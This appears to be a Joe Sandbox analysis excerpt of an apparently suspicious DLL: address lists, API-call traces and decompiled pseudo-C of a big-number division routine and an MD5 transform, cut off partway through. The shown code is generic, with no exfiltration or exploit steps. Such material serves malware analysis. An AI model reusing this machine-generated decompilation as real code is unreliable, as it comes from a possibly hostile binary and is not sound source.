    0x100090c9
    0x100090cb
    0x100090cb
    0x100090d3
    0x100090d8
    0x100090e0
    0x100090e3
    0x100090e5
    0x100090f9
    0x100090fe
    0x10009044
    0x10009044
    0x10009048
    0x10009050
    0x10009050
    0x10009050
    0x10009052
    0x10009055
    0x10009058
    0x10009058
    0x10008fcf
    0x10008fd2
    0x10008fd4
    0x00000000
    0x10008fd6
    0x10008fd6
    0x10008fdc
    0x10008fe1
    0x10008fd4
    0x10009065
    0x10009070
    0x00000000
    0x00000000
    0x00000000
    0x10008f3e
    0x10008f12
    0x10008f14
    0x10008f70
    0x10008f74
    0x10008f74
    0x00000000

    APIs
      • Part of subcall function 10005E8C: HeapAlloc.KERNEL32(00000008,00000001,00000000,?,10007C74,00000001,00000364,?,100059D4,00000001,00000001), ref: 10005ECD
      • Part of subcall function 10006807: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10006809
      • Part of subcall function 10006807: GetCurrentProcess.KERNEL32(C0000417,00000001), ref: 1000682B
      • Part of subcall function 10006807: TerminateProcess.KERNEL32(00000000), ref: 10006832
    • FindFirstFileExA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 10009031
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 10004950, Relevance: 3.5, APIs: 2, Instructions: 464Crypto
    C-Code - Quality: 90%
    			E10004950(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffff81c5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E100100A0(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E1000FFC0(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E10010060(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E10010060(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0x1000c78d
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E1000FFC0( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E1000C9BA(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E1000C9BA(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E1000C9BA(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}























































































    0x1000495c
    0x1000495f
    0x10004963
    0x1000496d
    0x10004970
    0x10004972
    0x10004974
    0x10004981
    0x10004981
    0x10004984
    0x10004984
    0x10004987
    0x1000498a
    0x1000498c
    0x10004abf
    0x10004ac1
    0x10004b0a
    0x10004b0e
    0x10004b14
    0x10004ac3
    0x10004ac5
    0x10004ac8
    0x10004aca
    0x10004acd
    0x10004acf
    0x10004ad1
    0x10004b05
    0x10004b05
    0x10004b05
    0x10004ad3
    0x10004ad8
    0x10004ade
    0x10004ade
    0x10004ae1
    0x10004ae3
    0x10004ae5
    0x00000000
    0x00000000
    0x10004ae7
    0x10004ae8
    0x10004aeb
    0x10004aee
    0x10004af0
    0x00000000
    0x10004af2
    0x00000000
    0x10004af2
    0x00000000
    0x10004af0
    0x10004af4
    0x10004afb
    0x10004aff
    0x10004b03
    0x00000000
    0x00000000
    0x10004b03
    0x10004b06
    0x10004b06
    0x10004b08
    0x10004b15
    0x10004b18
    0x10004b1b
    0x10004b1e
    0x10004b1e
    0x10004b22
    0x10004b25
    0x10004b28
    0x10004b2b
    0x10004b36
    0x10004b2d
    0x10004b32
    0x10004b32
    0x10004b40
    0x10004b45
    0x10004b48
    0x10004b4a
    0x10004b54
    0x10004b57
    0x10004b5e
    0x10004b61
    0x10004b64
    0x10004b6c
    0x10004b72
    0x10004b72
    0x10004b72
    0x10004b72
    0x10004b64
    0x10004b77
    0x10004b7e
    0x10004b7e
    0x10004b81
    0x10004b84
    0x10004db6
    0x10004db6
    0x10004b8a
    0x10004b8a
    0x10004b90
    0x10004b93
    0x10004b96
    0x10004b99
    0x10004b9c
    0x10004b9f
    0x10004ba2
    0x10004ba2
    0x10004ba5
    0x10004bac
    0x10004bac
    0x10004ba7
    0x10004ba7
    0x10004ba7
    0x10004bae
    0x10004bb2
    0x10004bb5
    0x10004bb7
    0x10004bba
    0x10004bc1
    0x10004bc4
    0x10004bc7
    0x10004bd2
    0x10004bd5
    0x10004bda
    0x10004bdf
    0x10004be6
    0x10004beb
    0x10004bed
    0x10004bef
    0x10004bf3
    0x10004bf6
    0x10004bf9
    0x10004c01
    0x10004c0a
    0x10004c0a
    0x10004c0c
    0x10004c0f
    0x10004c0f
    0x10004bf9
    0x10004c19
    0x10004c1e
    0x10004c23
    0x10004c25
    0x10004c28
    0x10004c2a
    0x10004c2d
    0x10004c30
    0x10004c32
    0x10004c35
    0x10004c38
    0x10004c3a
    0x10004c41
    0x10004c46
    0x10004c49
    0x10004c53
    0x10004c55
    0x10004c57
    0x10004c5a
    0x10004c5a
    0x10004c5c
    0x10004c5f
    0x10004c62
    0x10004c65
    0x10004c68
    0x10004c3c
    0x10004c3c
    0x10004c3f
    0x00000000
    0x00000000
    0x10004c3f
    0x10004c6b
    0x10004c6d
    0x10004c6f
    0x00000000
    0x10004c71
    0x10004c71
    0x10004c74
    0x10004c76
    0x10004c76
    0x10004c84
    0x10004c87
    0x10004c8c
    0x10004c8e
    0x00000000
    0x00000000
    0x10004c90
    0x10004c97
    0x10004c97
    0x10004c9a
    0x10004c9d
    0x10004ca0
    0x10004ca3
    0x10004ca3
    0x10004ca6
    0x10004ca9
    0x10004cad
    0x10004cb0
    0x10004cb2
    0x10004cb5
    0x00000000
    0x00000000
    0x10004cb7
    0x10004cb5
    0x10004c92
    0x10004c92
    0x10004c95
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x10004c95
    0x10004cbc
    0x10004cbc
    0x00000000
    0x10004cbc
    0x10004cb9
    0x00000000
    0x10004cb9
    0x10004c74
    0x10004c6f
    0x10004cbf
    0x10004cbf
    0x10004cc1
    0x10004ccb
    0x10004ccb
    0x10004cce
    0x10004cd0
    0x10004cd2
    0x10004cd4
    0x10004cd9
    0x10004cdc
    0x10004cdc
    0x10004cdf
    0x10004ce2
    0x10004ce5
    0x10004ce7
    0x10004cfc
    0x10004cfe
    0x10004d00
    0x10004d02
    0x10004d04
    0x10004d06
    0x10004d08
    0x10004d0a
    0x10004d0d
    0x10004d0d
    0x10004d11
    0x10004d13
    0x10004d19
    0x10004d1c
    0x10004d1c
    0x10004d1c
    0x10004d20
    0x10004d20
    0x10004d25
    0x10004d28
    0x10004d28
    0x10004d2d
    0x10004d2f
    0x10004d31
    0x10004d38
    0x10004d38
    0x10004d3a
    0x10004d3f
    0x10004d41
    0x10004d44
    0x10004d44
    0x10004d47
    0x10004d50
    0x10004d50
    0x10004d52
    0x10004d52
    0x10004d57
    0x10004d5d
    0x10004d61
    0x10004d64
    0x10004d67
    0x10004d69
    0x10004d69
    0x10004d69
    0x10004d6e
    0x10004d6e
    0x10004d71
    0x10004d74
    0x10004d33
    0x10004d33
    0x10004d36
    0x00000000
    0x00000000
    0x10004d36
    0x10004d31
    0x10004d7b
    0x10004d7b
    0x10004d7c
    0x10004cc3
    0x10004cc3
    0x10004cc5
    0x00000000
    0x00000000
    0x10004cc5
    0x10004d8c
    0x10004d91
    0x10004d94
    0x10004d98
    0x10004d99
    0x10004d9c
    0x10004d9f
    0x10004da0
    0x10004da3
    0x10004da6
    0x10004da9
    0x10004dac
    0x10004dac
    0x10004db4
    0x10004dbb
    0x10004dbc
    0x10004dbe
    0x10004dc0
    0x10004dc2
    0x10004dc5
    0x10004dd0
    0x10004dd0
    0x10004dd6
    0x10004dd6
    0x10004dd9
    0x10004dda
    0x10004dda
    0x10004dd0
    0x10004dde
    0x10004de0
    0x10004de2
    0x10004de4
    0x10004de4
    0x10004de6
    0x10004dea
    0x00000000
    0x00000000
    0x10004dec
    0x10004dec
    0x10004def
    0x10004df1
    0x00000000
    0x00000000
    0x00000000
    0x10004df1
    0x10004de4
    0x10004df3
    0x10004dfd
    0x00000000
    0x00000000
    0x00000000
    0x10004b08
    0x10004992
    0x10004992
    0x10004992
    0x10004995
    0x10004998
    0x1000499b
    0x100049cc
    0x100049ce
    0x10004a19
    0x10004a1b
    0x10004a22
    0x10004a29
    0x10004a2c
    0x10004a2f
    0x10004a35
    0x10004a35
    0x10004a36
    0x10004a39
    0x10004a40
    0x10004a49
    0x10004a4e
    0x10004a51
    0x10004a56
    0x10004a59
    0x10004a5b
    0x10004a60
    0x10004a63
    0x10004a66
    0x10004a66
    0x10004a66
    0x10004a6a
    0x10004a6d
    0x10004a6d
    0x10004a72
    0x10004a72
    0x10004a7d
    0x10004a88
    0x10004a88
    0x10004a8b
    0x10004a97
    0x10004a9c
    0x10004aa7
    0x10004aa9
    0x10004aab
    0x10004ab1
    0x10004ab6
    0x10004ab8
    0x10004abe
    0x100049d0
    0x100049dc
    0x100049dc
    0x100049df
    0x100049ef
    0x100049f5
    0x100049fc
    0x100049fe
    0x10004a06
    0x10004a08
    0x10004a0a
    0x10004a0f
    0x10004a12
    0x10004a18
    0x10004a18
    0x1000499d
    0x100049a0
    0x100049a4
    0x100049aa
    0x100049b9
    0x100049c3
    0x100049cb
    0x100049cb
    0x1000499b
    0x10004976
    0x10004979
    0x1000497f
    0x1000497f
    0x10004965
    0x1000496b
    0x1000496b

    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 00C61150, Relevance: .7, Instructions: 686Crypto
    C-Code - Quality: 25%
    			E00C61150(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t120;
				void* _t122;
				signed int _t341;
				intOrPtr _t342;
				signed int _t346;
				signed int _t348;
				signed int _t350;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t364;
				signed int _t366;
				signed int _t368;
				signed int _t371;
				signed int _t372;
				signed int _t464;
				signed int _t547;
				signed int _t552;
				signed int _t557;
				signed int _t561;
				signed int _t563;
				signed int _t565;
				signed int _t567;
				signed int _t570;
				signed int _t574;
				signed int _t586;
				signed int _t588;
				signed int _t590;
				signed int _t592;
				signed int _t594;
				signed int _t599;
				signed int _t601;
				signed int _t603;
				signed int _t606;
				signed int _t608;
				signed int _t610;
				signed int _t612;
				signed int _t617;
				signed int _t619;
				signed int _t621;
				signed int _t623;
				signed int _t625;
				signed int _t628;
				signed int _t629;
				signed int _t633;
				signed int _t635;
				signed int _t637;
				signed int _t640;
				signed int _t644;
				signed int _t646;
				signed int _t648;
				signed int _t650;
				signed int _t653;
				signed int _t655;
				signed int _t657;
				signed int _t659;
				signed int _t661;
				signed int _t663;
				signed int _t665;
				signed int _t667;
				intOrPtr _t668;
				signed int _t669;
				signed int _t670;
				signed int _t673;
				signed int _t675;
				signed int _t677;
				signed int _t679;
				signed int _t684;
				signed int _t686;
				signed int _t688;
				signed int _t692;
				signed int _t694;
				signed int _t696;
				signed int _t698;
				signed int _t700;
				signed int _t702;
				signed int _t704;
				signed int _t707;
				signed int _t712;

				_t120 =  *0xc6a004; // 0x26d30358
				_v8 = _t120 ^ _t712;
				_t122 = __edx + 2;
				_v80 = __ecx;
				_t669 = 0;
				do {
					_t574 =  *(_t122 + 1) & 0x000000ff;
					_t122 = _t122 + 4;
					 *((intOrPtr*)(_t712 + _t669 * 4 - 0x44)) = (((_t574 << 8) + ( *(_t122 - 4) & 0x000000ff) << 8) + ( *(_t122 - 5) & 0x000000ff) << 8) + ( *(_t122 - 6) & 0x000000ff);
					_t669 = _t669 + 1;
				} while (_t669 < 0x10);
				_t629 =  *(__ecx + 0x54);
				_t670 =  *(__ecx + 0x58);
				_t341 =  *(__ecx + 0x5c);
				asm("rol edx, 0x7");
				_t586 = _v72 + 0xd76aa478 + ( !_t629 & _t341 | _t670 & _t629) +  *((intOrPtr*)(_v80 + 0x50)) + _t629;
				_t342 = _v80;
				asm("rol esi, 0xc");
				_t673 = _t341 - 0x173848aa + ( !_t586 & _t670 | _t629 & _t586) + _v68 + _t586;
				asm("ror edi, 0xf");
				_t633 =  *((intOrPtr*)(_t342 + 0x58)) + 0x242070db + ( !_t673 & _t629 | _t673 & _t586) + _v64 + _t673;
				asm("ror ebx, 0xa");
				_t346 =  *((intOrPtr*)(_t342 + 0x54)) + 0xc1bdceee + ( !_t633 & _t586 | _t673 & _t633) + _v60 + _t633;
				asm("rol edx, 0x7");
				_t588 = _t586 + ( !_t346 & _t673 | _t633 & _t346) + 0xf57c0faf + _v56 + _t346;
				asm("rol esi, 0xc");
				_t675 = _t673 + ( !_t588 & _t633 | _t346 & _t588) + 0x4787c62a + _v52 + _t588;
				asm("ror edi, 0xf");
				_t635 = _t633 + ( !_t675 & _t346 | _t675 & _t588) + 0xa8304613 + _v48 + _t675;
				asm("ror ebx, 0xa");
				_t348 = _t346 + ( !_t635 & _t588 | _t675 & _t635) + 0xfd469501 + _v44 + _t635;
				asm("rol edx, 0x7");
				_t590 = _t588 + ( !_t348 & _t675 | _t635 & _t348) + 0x698098d8 + _v40 + _t348;
				asm("rol esi, 0xc");
				_t677 = _t675 + ( !_t590 & _t635 | _t348 & _t590) + 0x8b44f7af + _v36 + _t590;
				asm("ror edi, 0xf");
				_t637 = _t635 + ( !_t677 & _t348 | _t677 & _t590) + 0xffff5bb1 + _v32 + _t677;
				_v92 = _t637;
				asm("ror ebx, 0xa");
				_t350 = _t348 + ( !_t637 & _t590 | _t677 & _t637) + 0x895cd7be + _v28 + _t637;
				_v84 = _t350;
				asm("rol edx, 0x7");
				_t592 = _t590 + ( !_t350 & _t677 | _t637 & _t350) + 0x6b901122 + _v24 + _t350;
				_v88 = _t592;
				asm("rol edi, 0xc");
				_t640 = _t677 - 0x2678e6d + ( !_t592 & _t637 | _t350 & _t592) + _v20 + _t592;
				_v76 = _t640;
				_t679 =  !_t640;
				asm("ror ebx, 0xf");
				_t354 = _v92 + 0xa679438e + (_t679 & _t350 | _t640 & _t592) + _v16 + _t640;
				_t594 =  !_t354;
				_t464 = _v76;
				asm("ror edi, 0xa");
				_t644 = _v84 + 0x49b40821 + (_t594 & _v88 | _t640 & _t354) + _v12 + _t354;
				asm("rol esi, 0x5");
				_t684 = (_t679 & _t354 | _t464 & _t644) + _v68 + _v88 + 0xf61e2562 + _t644;
				asm("rol edx, 0x9");
				_t599 = (_t594 & _t644 | _t354 & _t684) + _v48 + _t464 + 0xc040b340 + _t684;
				asm("rol ebx, 0xe");
				_t356 = _t354 + ( !_t644 & _t684 | _t599 & _t644) + 0x265e5a51 + _v28 + _t599;
				asm("ror edi, 0xc");
				_t646 = _t644 + ( !_t684 & _t599 | _t356 & _t684) + 0xe9b6c7aa + _v72 + _t356;
				asm("rol esi, 0x5");
				_t686 = _t684 + ( !_t599 & _t356 | _t599 & _t646) + 0xd62f105d + _v52 + _t646;
				asm("rol edx, 0x9");
				_t601 = _t599 + ( !_t356 & _t646 | _t356 & _t686) + 0x2441453 + _v32 + _t686;
				asm("rol ebx, 0xe");
				_t358 = _t356 + ( !_t646 & _t686 | _t601 & _t646) + 0xd8a1e681 + _v12 + _t601;
				asm("ror edi, 0xc");
				_t648 = _t646 + ( !_t686 & _t601 | _t358 & _t686) + 0xe7d3fbc8 + _v56 + _t358;
				asm("rol esi, 0x5");
				_t688 = _t686 + ( !_t601 & _t358 | _t601 & _t648) + 0x21e1cde6 + _v36 + _t648;
				asm("rol edx, 0x9");
				_t603 = _t601 + ( !_t358 & _t648 | _t358 & _t688) + 0xc33707d6 + _v16 + _t688;
				_v76 = _t603;
				asm("rol ebx, 0xe");
				_t360 = _t358 + ( !_t648 & _t688 | _t603 & _t648) + 0xf4d50d87 + _v60 + _t603;
				asm("ror edi, 0xc");
				_t650 = _t648 + ( !_t688 & _t603 | _t360 & _t688) + 0x455a14ed + _v40 + _t360;
				_v84 = _t650;
				_t61 = _t688 - 0x561c16fb; // -1444681403
				asm("rol edx, 0x5");
				_t606 = _t61 + ( !_t603 & _t360 | _t603 & _t650) + _v20 + _t650;
				asm("rol esi, 0x9");
				_t692 = _v76 + 0xfcefa3f8 + ( !_t360 & _t650 | _t360 & _t606) + _v64 + _t606;
				asm("rol edi, 0xe");
				_t653 = _t360 + 0x676f02d9 + ( !_t650 & _t606 | _t692 & _t650) + _v44 + _t692;
				asm("ror ebx, 0xc");
				_t364 = _v84 + 0x8d2a4c8a + ( !_t606 & _t692 | _t653 & _t606) + _v24 + _t653;
				asm("rol edx, 0x4");
				_t608 = _t606 + (_t692 ^ _t653 ^ _t364) + 0xfffa3942 + _v52 + _t364;
				asm("rol esi, 0xb");
				_t694 = _t692 + (_t653 ^ _t364 ^ _t608) + 0x8771f681 + _v40 + _t608;
				asm("rol edi, 0x10");
				_t655 = _t653 + (_t694 ^ _t364 ^ _t608) + 0x6d9d6122 + _v28 + _t694;
				_t547 = _t694 ^ _t655;
				asm("ror ebx, 0x9");
				_t366 = _t364 + (_t547 ^ _t608) + 0xfde5380c + _v16 + _t655;
				asm("rol edx, 0x4");
				_t610 = _t608 + (_t547 ^ _t366) + 0xa4beea44 + _v68 + _t366;
				asm("rol esi, 0xb");
				_t696 = _t694 + (_t655 ^ _t366 ^ _t610) + 0x4bdecfa9 + _v56 + _t610;
				asm("rol edi, 0x10");
